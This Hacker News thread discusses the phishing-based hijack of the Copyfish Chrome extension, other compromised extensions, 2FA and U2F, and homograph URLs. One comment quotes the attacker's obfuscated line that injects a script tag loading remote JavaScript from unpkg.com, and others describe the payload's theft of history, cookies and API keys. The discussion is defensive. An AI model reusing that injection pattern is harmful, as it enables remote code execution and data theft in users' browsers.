
Our Copyfish extension was stolen and adware-infested - timr
https://a9t9.com/blog/chrome-extension-adware/
======
krackers
I guess this is as good a place as any to post that I noticed something
similar had happened to [User-Agent Switcher for Google
Chrome]([https://chrome.google.com/webstore/detail/user-agent-
switche...](https://chrome.google.com/webstore/detail/user-agent-switcher-
for-g/ffhkkpnppgnfaobgihpdblnhmmbodake?hl=en)) and [Block
Site]([https://chrome.google.com/webstore/detail/block-
site/eiimnmi...](https://chrome.google.com/webstore/detail/block-
site/eiimnmioipafcokbfikbljfdeojpcgbh?hl=en)). The "report abuse" link on the
page is useless. The former is very insidious in that it actually hides the
malware in a .jpg file that appears benign at first (promo.jpg for anyone who
wants to analyze) but when loaded in a canvas element and decoded in some
manner yields js that goes on to send all the user's http requests to some
domain while also injecting ads and redirecting to affiliate links.

~~~
milankragujevic
I am mortified. I had this extension installed for 2 years... What info did
they get and what can they do to me? Please help... (I uninstalled it, talking
about User-Agent Switcher)

~~~
krackers
I had the same concern when I found out. I narrowed it to see that it was
probably only within the last ~5 months that it was updated to include the
badware. I don't have the skills to decode it fully (since it was obfuscated
quite heavily) but I know at the very least that it sends browsing history and
injects ads.

I'm not sure if extensions also have the capability to capture the https body
info, but I erred on the safe side and also changed passwords.

------
jeswin
Chrome's security policy is surprisingly poor and is the reason why I stay
away from most extensions. "Read data from all websites" is like root on the
phone. It should be allowed only via deliberate, explicit user action. While
this will be an interesting UX challenge, defaulting to domain-specific
permissions is the sane thing to do in this age.

Case in point, I don't care about a readability or bookmarking plugin reading
a news link, but it shouldn't read my bank page.

~~~
twhb
I think more granular permissions, not domain-specific permissions, are the
solution. Domain-specific permissions destroy the illusion that the extension
is part of the browser, without restricting access as far as it should be.

For example, I made an extension that, upon a certain keyboard shortcut, saves
the current page in a specific bookmarks folder. Currently Chrome's
permissions model completely fails here, you need to request full access to
all user data, everywhere, indefinitely.

Which would be better, (a) granting full indefinite access to the domain
you're bookmarking most of the time you bookmark something, or (b) giving the
extension permission only to see the current tab's URL and title, and to edit
one specific bookmarks folder, and only during a keyboard shortcut's callback?

The granularity solution to your scenario would be to tie page-reading
permissions to your triggering the extension, and have them removed with code
execution end. So, now you don't need to worry about sensitive information
that shows up on other domains, or your bank deciding to use a subdomain, or
that one bank blog post that you actually do want it to see.

~~~
detaro
Isn't this what the "activeTab" permission is for (combined with a shortcut to
trigger the extensions pageAction)?

------
IncRnd
> “Click here to read more details” the email said. The click opened the
> “Google” password dialog, and the unlucky team member entered the password
> for our developer account. This looked all legit to the team member, so we
> did not notice the pishing attack as such at this point. Pishing for Chrome
> extensions was simply not on our radar screen.

First, it is excellent that you disclosed the issue.

Second, based upon the quoted text you really aren't accepting responsibility
for having been phished. The team member wasn't "unlucky." Your "radar"
shouldn't trick you into thinking you won't be attacked.

~~~
Pxtl
While I normally agree, I think it's important that they referred to the
specific person without using blaming language. The team failed and screwed up
because they had bad policies with their account. The individual team member
who was holding the keys when the screw-up happened? Unlucky.

Fix the process, not the people.

It's good that they're not throwing the poor person under the bus.

~~~
hartator
I don't think more policies will make a better place. One of the team member
screw up and stuff like this happen. I am questioning his security education
to have been phished so easily.

~~~
sillysaurus3
It's counter intuitive. I bet you $5 that if I target you, and you're not
expecting it, I can phish you. I've seen this happen in the field, and it
doesn't have much to do with education. Relax for an instant and I have you.

The only real defense is to glance at the url bar every time you're about to
enter your password. And even I find myself not doing that 100% of the time.
It's a numbers game.

A policy of popping up a popup "glance at url bar" every time you copy your
password from your password manager (which you're using, right?) would go a
long way.

~~~
hyperpape
Lastpass will tell you whether it recognizes the site when you go to fill in
the password (yes, I use it despite the scary stuff, I know I probably should
switch to OnePassword).

Do other password managers not do that?

Just curious, not trying to engage the bigger question of whether getting
phished is the user's fault.

~~~
tempay
One password has similar behaviour as well as verifying the integrity of the
browser[1]. It's not perfect, I'm sure a malicious extension would be
unimpeded, but these little features all added up and eventually made me
switch.

[1] [https://support.1password.com/code-
signature/](https://support.1password.com/code-signature/)

------
timdorr
Looks like they are using unpkg.com and npm to distribute the badware:

[https://unpkg.com/copyfish-
npm-2-8-5@1.0.1501416918/](https://unpkg.com/copyfish-
npm-2-8-5@1.0.1501416918/)

[https://www.npmjs.com/package/copyfish-
npm-2-8-5](https://www.npmjs.com/package/copyfish-npm-2-8-5)

I reached out to both services to have it shut down. Hopefully that will at
least kill it temporarily.

~~~
joshschreuder
Unpkg has a blacklist, so you can put up a PR if you know the package IDs.

[https://github.com/unpkg/unpkg.com/commit/ac09a03c75a51997b9...](https://github.com/unpkg/unpkg.com/commit/ac09a03c75a51997b909a63546f9773ca9aeb837)

A similar thing happened with another Chrome extension Social Fixer about a
month ago.

EDIT: It's already been blocked, nice work @mjackson

[https://github.com/unpkg/unpkg-
website/commit/7d4a4ba4958c16...](https://github.com/unpkg/unpkg-
website/commit/7d4a4ba4958c16d1b8d57876bc8931b7b8364d5e)

------
joshschreuder
A similar attack happened on another Chrome extension last month (Social
Fixer) with over 190k installs.

In fact, judging by the exploit code, I would guess the same author, as the
Social Fixer attack had a very similar hashed package on Unpkg as well.

In that scenario the author also didn't have 2FA enabled:
[https://www.facebook.com/socialfixer/posts/10155117415829342](https://www.facebook.com/socialfixer/posts/10155117415829342)

I feel like Google should take the next step of requiring all extension
developers to enable 2FA before being able to post an extension.

~~~
andmalc
> Google should take the next step of requiring all extension developers to
> enable 2FA before being able to post an extension.

Best comment here

~~~
pbhjpbhj
Which would allow real world identity to be discovered, in the event of
malware is there a possibility of prosecution eg for something related to
recklessly causing damage (through inaction/action)?

------
mikegerwitz
This is why it is important to cryptographically sign releases. Browsers are a
huge problem with this.

All of the software I use is signed at some point in the chain (be it by the
actual author or by the package manager, who'd better be verifying signatures
if they're available, otherwise at least not blindly updating), _except for my
browser extensions_. Most of it is also _reproducible_! I can get around this
for some things---I use GNU Guix in addition to Debian, and they package some
extensions. I need to start using them.

Of course, the signature should really come from the actual author, not the
package maintainer for a particular distro; there's room for error. In the
case of a project being hijacked (e.g. Copyfish), hopefully a maintainer would
notice. Git commit and tag signing is an easy way to do this if you don't
separately sign releases; package maintainers should be building from source.

In the case of Copyfish: if the browser validated signatures from the authors,
then this would have been thwarted.

(Maybe there is some code signing protections in place? I'm not an extension
developer for either Chromium or Firefox; please let me know if something does
exist!)

~~~
macNchz
My understanding is that Chrome extensions are indeed signed and you can't
upload updates without signing the new package with the same key, so
presumably the attacker had access to the private key after phishing the
Google password.

Perhaps it was stored somewhere accessible by that account? Or accidentally
packaged with the extension itself? If that were the case the spear phishing
attack would make sense: someone scraping the Chrome store for extensions that
contain a key file, then phishing their developer account credentials would be
more efficient than phishing credentials without knowing beforehand whether
you'd be able to get the private key and update the extension.

[https://developer.chrome.com/extensions/packaging](https://developer.chrome.com/extensions/packaging)

~~~
mikegerwitz
Thanks.

What's concerning to me is the section entitled "Uploading a previously
packaged extension to the Chrome Web Store", which asks the user to place the
private key into the package's root and include it in a zip. First: why? Why
upload the private key? That leaks it to Google and on top of that stores it
in multiple places; the user could forget to delete the zip (and do so
securely), for example. And the private key in the root is probably a copy, so
that has to be shreded too.

For updating the package, you select the project root as well. If you didn't
remove your private key before doing so, I'm assuming you'd be releasing your
key?

------
flyGuyOnTheSly
This is the second extension that I use on chrome that has been hijacked.

The first was live http headers [0]

I have never had this experience on Firefox.

Is it simply a matter of Chrome being a bigger target?

[0]
[https://www.webmasterworld.com/webmaster/4829365.htm](https://www.webmasterworld.com/webmaster/4829365.htm)

~~~
Buge
The Great Suspender Chrome extension was also phished

[https://github.com/deanoemcke/thegreatsuspender/issues/512](https://github.com/deanoemcke/thegreatsuspender/issues/512)

~~~
zootam
but apparently non-maliciously

~~~
Buge
What do you mean?

I thought the attacker stole the account maliciously, but hadn't quite gotten
around to inserting the malware by the time it was taken back.

~~~
flyGuyOnTheSly
The live http headers hacking was quite embarrassing for myself personally.

I had strong suspicions that a certain webhost a new client of mine utilized
was both prone to attack, and not very forthcoming when past attacks had
occurred.

So when I loaded their own website one day and found it full of ads for
russian pornography... I confirmed my own bias that the webhost had been
hacked... deleted the account, and moved everything over to AWS.

Changed all the passwords, freaked out a bit, etc...

Then I realized that it was just the extension I was running that injected
those ads... d'oh!

------
userbinator
The somewhat obfuscated JS downloaded from unpkg.com has what appears to be a
Google Analytics ID in it: UA-103045553-1. I'm not sure if that can help trace
the origin.

------
busterarm
It's a bad weekend for Chrome Extensions, it seems.

[https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20pre...](https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Tomer-
Cohen-Game-Of-Chromes-Owning-The-Web-With-Zombie-Chrome-Extensions-WP.pdf)

------
ivanbakel
Good reminder that you should never be in the mindset of "expecting" a phish
from any source - trust is how they get you. Also, if a message was really
urgent, you wouldn't have to click-through to see it.

~~~
sillysaurus3
I think I'm misreading your comment, but the best defense against phishing is
to always be expecting a phishing attack from every source. Every time you're
about to paste your password, glance at the url bar.

~~~
laurencei
> Every time you're about to paste your password, glance at the url bar.

Actually - I disagree with this. You can no longer "glance" at the url bar to
determine if you are on the right domain due to Unicode chars if you clicked a
link.

The only safe way is to type the url yourself into the browser.

If it is a long link - then at least typing the base domain, and pasting the
"rest" is _probably_ safe?

~~~
sillysaurus3
This actually isn't true. A website like [https://www.xn--
80ak6aa92e.com/](https://www.xn--80ak6aa92e.com/) won't show up as apple.com.
Browsers don't allow Unicode rendering in the URL bar.

Maybe IE is affected though. I haven't tested every browser. But it's a known
security concern.

~~~
fnj
Sorry to tell you, _does_ show up as apple.com in my browser. Chrome
52.0.2743.82-1 on Arch x86_64.

~~~
arthurfm
The IDN vulnerability was fixed by Google in Chrome 58.

[https://arstechnica.co.uk/information-
technology/2017/04/chr...](https://arstechnica.co.uk/information-
technology/2017/04/chrome-firefox-and-opera-unicode-phishing/)
[https://bugs.chromium.org/p/chromium/issues/detail?id=683314](https://bugs.chromium.org/p/chromium/issues/detail?id=683314)

Why have you got such an old version of Chrome?

~~~
fnj
Thank you. That gives me a strong reason to update.

To answer your question, (1) it's pretty arduous to install Chrome from the
AUR, and (2) I am wary of Google removing useful functionality from Chrome.

------
gargravarr
Spear phishing is remarkably effective, even against tech-savvy people. One of
the most alarming aspects is that we've become trained to click links in
emails as soon as we see some trustworthy indication, be it something we were
expecting, a spoofed sender or copying Google's layout, further re-enforced by
an accurate login page clone.

I think the best defence here is to condition ourselves out of this behaviour.
If you receive a link in an email, don't click it - view the source or paste
it into a text document and examine it. And if you aren't expecting an email,
such as Google emailing out of the blue, go to the known-trusted site and see
if there's any pending notifications.

Seems we need to stop trusting email.

------
bjornstar
I've gotten this phishing e-mail 3 times over the past month or so. The first
time I almost fell for it.

Looking at the attacker's code, they are currently trying to steal cloudflare
api keys in addition to stealing cookies from all sites the extension users
visit :(

------
staticautomatic
Of course it's a phishing attack. Why would Google send you a bit.ly link to
your own Google account?

~~~
alecthomas
"Note that the bitly link was not directly visible in the phishing email, as
it was an HTML-email. That is another lesson learned: Back to standard, text-
based email as the default."

~~~
BenjiWiebe
I always look at the mouse over url. And check the URL in the address bar. And
rely on the password manager in the browser. And sometimes login in a new tab,
then go back and reload the link.

~~~
4ad
A pity some browsers now hide the mouse over URL.

I use this in safari to bring it back: [https://visnup.github.io/Minimal-
Status-Bar/](https://visnup.github.io/Minimal-Status-Bar/)

~~~
Rjevski
In Safari you can go to "View -> Show status bar" to bring it back natively
without a third-party extension.

~~~
4ad
Amazing, thanks!

------
tedunangst
Something to be said about auto updating software...

------
sgroppino
I'd have though that two-factor authentication could have prevented this type
of attack?

~~~
giovannibajo1
Only with U2F, because the hardware dongle would refuse to provide the OTP to
a different domain

~~~
devrandomguy
Yeah, we really need to distinguish between a 2FA app and a dedicated hardware
key. My phone is probably the least secure thing I've ever owned, both in
terms of technical security, and physical security.

This whole 2FA thing has been really jarring for me, because I always treated
my phone like a public space: no password, no private data (that I know of),
ready for inspection by foreign authorities. Of all the things the world could
ask me to trust, why the phone?

~~~
TeMPOraL
> _Of all the things the world could ask me to trust, why the phone?_

Because it's the only instance of a computer that you can expect majority of
users to own and always have on them.

2FA as a thing would not get any reasonable adoption if you required people to
buy hardware keys to use it. Not to mention, hardware keys do not work on
every device one would like to log in from (AFAIK you can't plug in a Yubikey
to an Android tablet, and it may not have NFC built in).

~~~
mschuster91
> AFAIK you can't plug in a Yubikey to an Android tablet, and it may not have
> NFC built in

Using an USB OTG adapter, it should be possible. However, even the flagship
tablets of Samsung don't carry NFC, only the phones do - and even there it's a
hit and miss if you have NFC.

Apple, on the other hand, doesn't have developer-accessible NFC _anywhere_.

This is a real shame.

------
shawn-butler
>> We are trying to contact Google, but so far, have been unable to reach any
human being that can help.

So typical, unfortunately.

------
Cthulhu_
No 2FA? No additional password / 2FA challenge when a big, dangerous operation
like moving an extension to another account is triggered?

------
logicallee
We should never have to read a title "disable immediately" by a developer. In
a news article. That is not how this should be distributed, in case the
original developer is the one distributing the news.

Instead, Google should generate an emergency disable code that a developer can
put into a simple web form from anywhere in the world, even if the developer
has been locked out of every one of their accounts, which immediately
centrally disables that extension.

How it should work.

Parts.

1\. "revocation code generation" and explanation. Text like: "this is a secret
revocation code. Anyone who learns it can immediately disable your extension.
Keep it secure and separate from all of your production systems. You will be
able to use it even if locked out of all other acccess."

2\. A web form people can submit revocation codes to, from anywhere with
Internet access.

The code should be very high-entropy and generated by Google. However, it
should not have ambiguous characters like 1 and capital I.

I personally would generate it using a dicewords-like wordlist. Also, I
personally would ensure it had approximately 384 bits of total entropy of
which one third is a recovery checksum. This enables the developer to write
many words down wrong and still be able to disable their extension. In case
the recovery record/checksum portion were used, I would offer the user the
result "You appeared to have made a mistake which we could correct. Is this
the correct disable key?" then show the corrected version.

However, this last idea seems to be beyond the state of cryptography worldwide
(i.e. for some reason I have written something that exceeds best practices
worldwide, like I'm from the future or something), so I understand if Google's
cryptographers don't implement this part.

The above seems a bit grandiose of me so here is the comment where I first
wrote about this:

[https://news.ycombinator.com/item?id=14571414](https://news.ycombinator.com/item?id=14571414)

~~~
Animats
_We should never have to read a title "disable immediately" by a developer. In
a news article._

If you want to change that, start contacting reporters from mainstream media.
If this hits the New York Times or the Wall Street Journal, or at least
Techdirt, Google might notice.

~~~
logicallee
Google is staffed by geniuses who also read HN and I feel it is sufficient
that I suggested one possible correct solution here on HN. I am sure they'll
introduce some solution to this problems. (I mean some way for them to disable
compromised extensions centrally.)

I am not personally an extension developer and don't run many.

~~~
likpok
The people you need to convince is Google management, so that they prioritize
this over everything else on the roadmap. One easy way to do that from outside
is to make it actually a priority, by making it a PR issue. Otherwise it turns
into one of those perennial 'things we want to do' that never beats out the
critical items on the roadmap.

~~~
logicallee
can you give a source for this insight? tell me more.

It does explain so much. for example all this work was put into a ridiculous,
animated, moving, flashing new gmail sign-in page that was pre-announced for
weeks (our sign-in page is changing!) and after all that work does not include
even seven and a half minutes worth of improvement by a developer. For
example, I had to laugh and laugh after I realized it wasn't accepting my
password because my caps lock was on.

I would expect a popup warning if you have your caps lock turned on while
typing. Because, you know, that is one of literally like 3 things you can do
to improve a sign-in page that is that dynamic and moving and flashing.
There's just not much to improve.

All that flash and it doesn't _do_ anything at all. Your comment gives a lot
of insight as to why so I would like to understand this cultural shift.

how does management work at Google now?

------
thadk
FYI, This "Better History" extension in Chrome has a history of selling
browser history since it was sold by its developer:
[https://chrome.google.com/webstore/detail/better-
history/obc...](https://chrome.google.com/webstore/detail/better-
history/obciceimmggglbmelaidpjlmodcebijb?hl=en)

They frequently remove it from the store when people notice and restore it a
or so month later.

The comments over the past year or so detail the symptoms of spyware. The
"Report Abuse" button in Chrome Store feels useless.

------
tarosnow
You can use the Chrome Apps & Extensions Developer Tools[1] to monitor the
activity of your apps and extensions.

[1]: [https://chrome.google.com/webstore/detail/chrome-apps-
extens...](https://chrome.google.com/webstore/detail/chrome-apps-extensions-
de/ohmmkhmmmpcnpikjeljgnaoabkaalbgc)

------
cgb223
Can someone explain to me why the attacker wrote the script source tag as

    
    
      "var config_fragment = '<sc' + 'ript sr' + 'c="ht'+ 'tps://un' + 'p' + 'kg.com/' + hash + '/' + hour + '.js"></sc ' + 'ript>';"
    

Instead of just:

    
    
      var config_fragment = '<script src="https://unpkg.com/' + hash + '/' + hour + '.js"></script>';

~~~
anonred
It’s usually done to prevent the parser from interpreting the closing script
tag early: [https://stackoverflow.com/questions/236073/why-split-the-
scr...](https://stackoverflow.com/questions/236073/why-split-the-script-tag-
when-writing-it-with-document-write)

~~~
limeblack
If this is truly the reason the coder went overboard in parsing it up IMO.

------
sunnyps
Please use Google's "Password Alert" Chrome extension to protect your Google
account. It will notify you if you accidentally enter your Google password on
another website.

------
jwilk
> Back to standard, text-based email as the default.

Yeah, but what will you do when your receive an HTML-only mail, or a mail with
text/plain alternative saying "lol, get a better MUA", or a mail with
text/plain alternative so mangled it can't be read without making your brain
hurt?

All these are common occurrences in automatically sent e-mails these days.

~~~
jstanley
View the HTML mail, but with fancy rendering, images, all remote content, etc.
disabled.

Thunderbird does this by default.

~~~
jwilk
> View the HTML mail

And that's exactly what phishers want you to do.

------
yrro
Debian patched the Chromium browser to refuse to install or update add-ons
from the Chrome store. At first I found this annoying, but I am coming around
to their way of thinking--that ultimately I can only trust software in the
Debian archive.

------
Endy
While I understand how some people can take this as a cautionary tale in favor
of 2FA, as someone who doesn't like it and won't use it, I guess my mindset is
very simple. There's the old saw that over time, computing has evolved from
smart people in front of dumb terminals into dumb people in front of "smart"
terminals. This attack is proof of it; and while 2FA might have had an impact,
the major issue here is that we had a dumb person - this "unlucky" team member
- who either didn't have the training or the common sense to understand that
if you have a public presence on the Internet, you are a target. If you have
auto-updating software installed on more than 1 machine, you are going to be
someone's target because they want access to that person's computer.

The lesson here is: never trust anyone or anything.

~~~
driverdan
> The lesson here is: never trust anyone or anything.

Which is why you should use 2FA and why you shouldn't trust someone who says
they don't use it.

~~~
Endy
I don't trust any of the 2FA providers. And I have neither the time nor the
interest to try and learn to code it in binary.

~~~
cyphar
TOTP is a specification and there are many free software implementations. U2F
is also a specification (but generally they aren't free software
implementations).

~~~
Endy
Again - I don't trust the people who created the specifications; and I don't
trust either the free implementors or the non-free ones, though my inclination
would be to go with non-free if I were forced. As it is, I simply don't use
services that rely on them.

------
interfixus
tl;dr: A member of the development team thought it unexceptional and credible
that Google should be using a clickable bit.ly url in an unsolicited email
asking for login and update.

The world is an uphill kind of place.

------
_Codemonkeyism
"This looked all legit to the team member" sure the team member checked the
URL of the password screen? Yes, and Google using Freshdesk.

------
Rainymood
(In the article "phishing" is consistently misspelled as "pishing".)

~~~
IncRnd
Perhaps the author of the page really isn't the author of Copyfish, and they
phished us all with a page about getting phished.

------
sneak
TLDR: Use FIDO hardware 2FA. The tokens are $15. No excuses.

------
nvr219
Always do a 2fa

